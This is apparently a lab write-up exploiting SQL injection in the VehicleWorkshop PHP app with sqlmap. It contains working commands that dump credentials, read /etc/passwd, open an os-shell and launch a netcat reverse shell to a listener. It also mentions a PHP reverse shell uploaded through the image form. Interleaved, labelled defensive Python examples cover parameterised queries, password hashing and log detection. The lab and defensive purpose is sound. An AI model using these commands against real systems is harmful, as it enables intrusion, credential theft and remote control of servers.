sqlmap -- VehicleWorkshop SQL Injection

by Vince
in Blog

VehicleWorkshop is vulnerable to SQL injection, and you can read the short entry about it on Exploit-DB.  Essentially, our injection point is the "vehicleid=" parameter.  This isn't a login prompt, so I can't use something like:  bob' or 1=1;-- and while I don't like tools, this is definitely a job for sqlmap.  
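To make the weakness behind that "vehicleid=" parameter concrete from the defender's side, here is an added Python example (it is not code from the original post, and not VehicleWorkshop's own PHP): a constructed SQLite stand-in for a vehicle lookup, with the string-spliced query that sqlmap exploits beside the validated, parameterised form. The vehicle table, its columns and its rows are assumptions; the real eworkshop vehicle schema is not shown on this page.

```python
import sqlite3

# Constructed stand-in for the eworkshop database (assumption: the real
# vehicle table schema is not shown on the page; these rows are made up).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE vehicle (vehicleid INTEGER PRIMARY KEY, regno TEXT, owner TEXT)"
    )
    conn.executemany(
        "INSERT INTO vehicle VALUES (?, ?, ?)",
        [(1, "ABC-123", "alice"), (2, "XYZ-789", "bob"), (3, "QRS-456", "carol")],
    )
    return conn


def lookup_vulnerable(conn, vehicleid):
    # The pattern sqlmap finds: the request parameter is spliced straight
    # into the SQL text, so the parameter can change the query's logic.
    sql = "SELECT vehicleid, regno, owner FROM vehicle WHERE vehicleid = " + vehicleid
    return conn.execute(sql).fetchall()


def lookup_safe(conn, vehicleid):
    # Hardened form: validate the type first, then bind the value as a
    # parameter so the driver never treats it as SQL.
    try:
        vid = int(vehicleid)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT vehicleid, regno, owner FROM vehicle WHERE vehicleid = ?", (vid,)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    tampered = "2 OR 1=1"  # constructed input: a value no real vehicleid has
    print("vulnerable, normal input :", lookup_vulnerable(db, "2"))
    print("vulnerable, tampered     :", lookup_vulnerable(db, tampered))
    print("safe, tampered           :", lookup_safe(db, tampered))
```

The same tampered value returns every row through the spliced query and nothing through the bound one; in the PHP application the equivalent fix is a prepared statement (mysqli or PDO) with an integer cast on vehicleid before it reaches the query.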

Before we get started, let's get this app set up.  You can download the app from Exploit-DB, extract it to a folder, and set the permissions with chmod 777.  I wanted command execution, which is why I gave the folder wrx.  Without it, you won't be able to perform any of the os-shell commands.  You can get into sql-shell and poke around, but it's not nearly as fun.  

Once you get the application installed, edit: 

dbconnection.php

... and give it the correct MySQL connection info.  Then log in to mysql, create a database titled: 

eworkshop

... and log out of mysql.  Now we're going to import the SQL dump:

mysql -u root -p eworkshop < ./db/eworkshop.sql

When we hit the site with our browser, we're presented with the login page.  You don't need to log in, but if you wish, the username and password are admin : admin



With Burpsuite open, we're going to hit our vulnerable page:



Moving over to Burpsuite, we see the capture:



Now we're going to copy that data from Burpsuite and save it into a text file titled:  post.txt



First thing we're going to do is take our post.txt data and feed it to sqlmap to see if it's injectable:

sqlmap -r post.txt -p vehicleid --level 5 --risk 3 --dbs --threads 10

After a minute or so, we're going to see:

GET parameter 'vehicleid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

We're going to take the default because we've got our entry with vehicleid.  sqlmap then continues with the injection and spits out the available databases:

back-end DBMS: MySQL >= 5.0.12
[14:59:22] [INFO] fetching database names
[14:59:23] [INFO] used SQL query returns 3 entries
[14:59:23] [INFO] starting 5 threads
[14:59:24] [INFO] retrieved: information_schema
[14:59:24] [INFO] retrieved: mysql
[14:59:24] [INFO] retrieved: eworkshop
available databases [5]:
[*] eworkshop
[*] information_schema
[*] mysql

Excellent.  We see our eworkshop database, now let's pull some table information:

sqlmap -r post.txt -p vehicleid -D eworkshop --columns --threads 10

[ For the sake of keeping your eyes on what's important, I'm truncating the output for all of the queries -- they are lengthy.  ]

When sqlmap finishes, we are presented with two tables worth exploring.  If this were a live server, we'd go after both of these tables but since the customer table is empty, I'm just pointing it out but won't poke any more into it.

Table: customer
[11 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| address     | text        |
| city        | varchar(25) |
| contactno1  | varchar(25) |
| contactno2  | varchar(25) |
| createddate | date        |
| custid      | int(10)     |
| emailid     | varchar(50) |
| fname       | varchar(25) |
| lname       | varchar(25) |
| password    | varchar(15) |
| zipcode     | varchar(15) |
+-------------+-------------+

Database: eworkshop
Table: employee
[9 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| contactno1   | varchar(25) |
| contactno2   | varchar(25) |
| emailid      | varchar(25) |
| employeeid   | int(10)     |
| employeetype | varchar(25) |
| fname        | varchar(25) |
| lname        | varchar(25) |
| loginid      | varchar(25) |
| password     | varchar(25) |
+--------------+-------------+

Now that we have table and column information, let's get some login information:

sqlmap -r post.txt -p vehicleid -D eworkshop -T employee -C loginid,password --dump --threads 10

Note the password is sitting in clear text.  :\

Database: eworkshop
Table: employee
[1 entry]
+---------+----------+
| loginid | password |
+---------+----------+
| admin   | admin    |
+---------+----------+
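The cleartext admin : admin row is the second finding here, and it is the one that survives even when the folder permissions are right. As an added example (not from the original post and not the application's own code), this is how that employee.password column should be stored: a salted, memory-hard scrypt digest from Python's standard library, verified with a constant-time compare. The storage format string and the cost parameters are my own choices, not taken from any project guidance.

```python
import base64
import hashlib
import hmac
import os

# Cost parameters (assumption: a reasonable default chosen for this example).
# Memory per hash is 128 * r * n bytes, i.e. 16 MiB with these values.
SCRYPT_N = 2 ** 14
SCRYPT_R = 8
SCRYPT_P = 1


def hash_password(password: str) -> str:
    """Return a self-describing string: scrypt$n$r$p$<salt b64>$<digest b64>."""
    salt = os.urandom(16)  # fresh random salt per password
    digest = hashlib.scrypt(
        password.encode("utf-8"), salt=salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32
    )
    return "$".join(
        [
            "scrypt",
            str(SCRYPT_N),
            str(SCRYPT_R),
            str(SCRYPT_P),
            base64.b64encode(salt).decode("ascii"),
            base64.b64encode(digest).decode("ascii"),
        ]
    )


def verify_password(stored: str, candidate: str) -> bool:
    """Recompute the digest with the stored parameters and compare in constant time."""
    try:
        algo, n, r, p, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False  # malformed (or legacy cleartext) value never verifies
    if algo != "scrypt":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    actual = hashlib.scrypt(
        candidate.encode("utf-8"), salt=salt, n=int(n), r=int(r), p=int(p), dklen=len(expected)
    )
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    stored = hash_password("admin")  # constructed: the page's demo credential
    print(stored)
    print("correct password :", verify_password(stored, "admin"))
    print("wrong password   :", verify_password(stored, "Admin"))
```

One practical caveat the column dump above makes visible: the stored string is well over 25 characters, so the varchar(25) password columns in employee (and varchar(15) in customer) would have to be widened before a migration like this could land.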

This is where the permissions set at 777 are going to allow us to move into os command execution.  If the permissions on this folder were set correctly, we'd have to explore other avenues.  That doesn't mean you can't pop this box, you can.  This just makes it a lot quicker and it shows off the os-shell function of sqlmap.

Starting off with something simple:

sqlmap -r post.txt -p vehicleid -D eworkshop --os-cmd=whoami

You'll be prompted for a response on "web server support", stick with the default, 4:

which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[15:13:34] [INFO] retrieved the web server document root: '/var/www'
[15:13:34] [INFO] retrieved web server absolute paths: '/var/www/VehicleWorkshop/viewvehiclestoremore.php'
[15:13:34] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[15:13:34] [INFO] heuristics detected web page charset 'ascii'
[15:13:34] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://192.168.0.52:80/tmpulbhh.php
[15:13:34] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://192.168.0.52:80/tmpbfwca.php
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'www-data'
[15:13:40] [INFO] cleaning up the web files uploaded
[15:13:40] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[15:13:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.52'

[*] shutting down at 15:13:40

If you look in:  /root/.sqlmap/output/192.168.0.52

[ change the ip to reflect your machine's address ] 

... you will find the log file containing the output from your commands.  You can grep the file:

cat /root/.sqlmap/output/192.168.0.52/log | grep "command standard output"
command standard output: 'www-data'
command standard output:
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'

You can go for something a little more interesting but we're working under the www-data account so you're not getting /etc/shadow.

sqlmap -r post.txt -p vehicleid -D eworkshop --os-cmd="cat /etc/passwd"

You know what a passwd file looks like.  :)

Let's go deeper:

sqlmap -r post.txt -p vehicleid -D eworkshop --os-shell

os-shell> id
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell>
os-shell> nc -e /bin/bash 192.168.0.51 53 &
do you want to retrieve the command standard output? [Y/n/a] y
No output
os-shell>

My listener is set up:

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.0.51:53
[*] Sending stage (36 bytes) to 192.168.0.52
[*] Command shell session 6 opened (192.168.0.51:53 -> 192.168.0.52:40556) at 2018-06-27 15:24:29 -0700


python -c 'import pty;pty.spawn("/bin/sh")'
export TERM=xterm
$ export TERM=xterm
$ whoami
whoami
www-data
$

At this point, I have my low privilege shell and I can work on privilege escalation.  

I haven't played with this application other than the SQL injection; I'm going to see if I can use my admin : admin credentials and exploit this box another way for a low privilege shell.

I hope this is helpful.

Edit:

A few minutes after I posted this entry, I went back to the application because I had an idea.  I wondered if I could upload a shell through the image upload function.  Zero protection whatsoever.  :)



/VehicleWorkshop/upload/rshell443.php

^^ I can haz all the shellz.  

Rewinding a bit -- I gave the www folder wrx permissions to get os cmd execution but in the real world, you wouldn't have been able to perform those commands if the permissions were set correctly.  However, you would have been able to retrieve the admin : admin credentials, at which point, you would have been able to upload the shell like I just did.  You still get a low priv shell -- in the real world.
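Both shells in this post leave the same kind of trace in the web server's access log: sqlmap's os-shell stages tmp*.php files straight into the document root (tmpulbhh.php and tmpbfwca.php in the output above), and the upload route drops a .php file under /upload/. As an added example for the defender (not from the original post), here is a small Python scanner over constructed combined-format log lines that flags those patterns plus sqlmap's default User-Agent. The log lines are made up and only reuse the post's lab addresses; the assumption that stager names generalise to "tmp" plus a few lowercase letters is mine, based on the two names the post shows, and the User-Agent string is an approximation of sqlmap's default rather than a copy.

```python
import re

# Apache/nginx combined log format. The sample lines are constructed; only the
# IPs follow the post's lab addresses, everything else is made up.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumption: the stager/backdoor names seen in the post (tmpulbhh.php,
# tmpbfwca.php) generalise to "tmp" + a few lowercase letters + ".php",
# written directly into the document root.
STAGER_RE = re.compile(r"^/tmp[a-z]{4,8}\.php$")
# Any server-side script being fetched from the image upload directory.
UPLOAD_PHP_RE = re.compile(r"/upload/[^/]+\.php$", re.IGNORECASE)

SAMPLE_LOG = """\
192.168.0.51 - - [27/Jun/2018:15:13:30 -0700] "GET /VehicleWorkshop/viewvehiclestoremore.php?vehicleid=1 HTTP/1.1" 200 5123 "-" "sqlmap/1.x (http://sqlmap.org)"
192.168.0.51 - - [27/Jun/2018:15:13:34 -0700] "POST /tmpulbhh.php HTTP/1.1" 200 312 "-" "sqlmap/1.x (http://sqlmap.org)"
192.168.0.51 - - [27/Jun/2018:15:13:36 -0700] "GET /tmpbfwca.php HTTP/1.1" 200 45 "-" "Mozilla/5.0"
192.168.0.51 - - [27/Jun/2018:15:30:02 -0700] "GET /VehicleWorkshop/upload/rshell443.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.7 - - [27/Jun/2018:15:31:10 -0700] "GET /VehicleWorkshop/upload/car1.jpg HTTP/1.1" 200 84211 "-" "Mozilla/5.0"
10.0.0.7 - - [27/Jun/2018:15:31:12 -0700] "GET /VehicleWorkshop/viewvehiclestoremore.php?vehicleid=2 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of reasons a parsed access-log entry is suspicious."""
    reasons = []
    path = entry["path"].split("?", 1)[0]  # drop the query string
    if "sqlmap" in entry["ua"].lower():
        reasons.append("sqlmap user agent")
    if STAGER_RE.match(path):
        reasons.append("tmp*.php script in document root (sqlmap stager pattern)")
    if UPLOAD_PHP_RE.search(path):
        reasons.append("PHP script requested from the upload directory")
    return reasons


def scan_log(text):
    """Return (ip, path, reasons) for every line that trips at least one rule."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append((entry["ip"], entry["path"], reasons))
    return findings


if __name__ == "__main__":
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(ip, path, "->", "; ".join(reasons))
```

sqlmap removes its staged files when it finishes (the "cleaning up the web files uploaded" line and the two 404s in the output above), so the access-log entries are often the only artifact left of the os-shell stage; the rshell443.php upload, by contrast, stays on disk until someone deletes it, and a file-integrity check on /upload/ that refuses anything but image types would catch it at write time rather than at request time.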